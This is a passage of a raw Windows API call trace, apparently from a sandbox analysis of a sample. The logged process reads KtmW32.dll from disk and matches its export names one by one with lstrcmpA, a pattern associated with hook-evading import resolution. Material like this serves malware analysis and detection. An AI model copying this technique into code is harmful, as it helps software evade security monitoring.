(lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0140.559] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0141.368] GetProcessHeap () returned 0x430000 [0141.369] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4121040 | out: hHeap=0x430000) returned 1 [0141.374] GetProcessHeap () returned 0x430000 [0141.374] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449100 [0141.374] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0141.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0141.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0141.378] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0141.379] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0141.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0141.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0141.379] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0141.379] GetProcessHeap () returned 0x430000 [0141.379] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5e00) returned 0x2d65030 [0141.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0141.379] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0141.380] CloseHandle (hObject=0x17c) returned 1 [0141.380] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0141.380] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0141.380] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0141.380] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0141.380] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0141.380] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0141.380] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0141.380] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0141.380] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0141.380] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0141.380] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0141.380] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0141.380] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0141.380] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0141.380] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0141.381] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0141.381] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0141.381] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.381] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0141.382] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0141.382] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0141.382] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0141.382] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0141.382] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0141.382] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.382] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0141.383] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0141.383] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0141.384] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0141.385] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0141.385] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0141.385] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.386] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0141.387] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0141.387] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0141.387] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0141.388] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0141.388] GetProcessHeap () returned 0x430000 [0141.388] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x430000) returned 1 [0141.572] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0141.573] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: 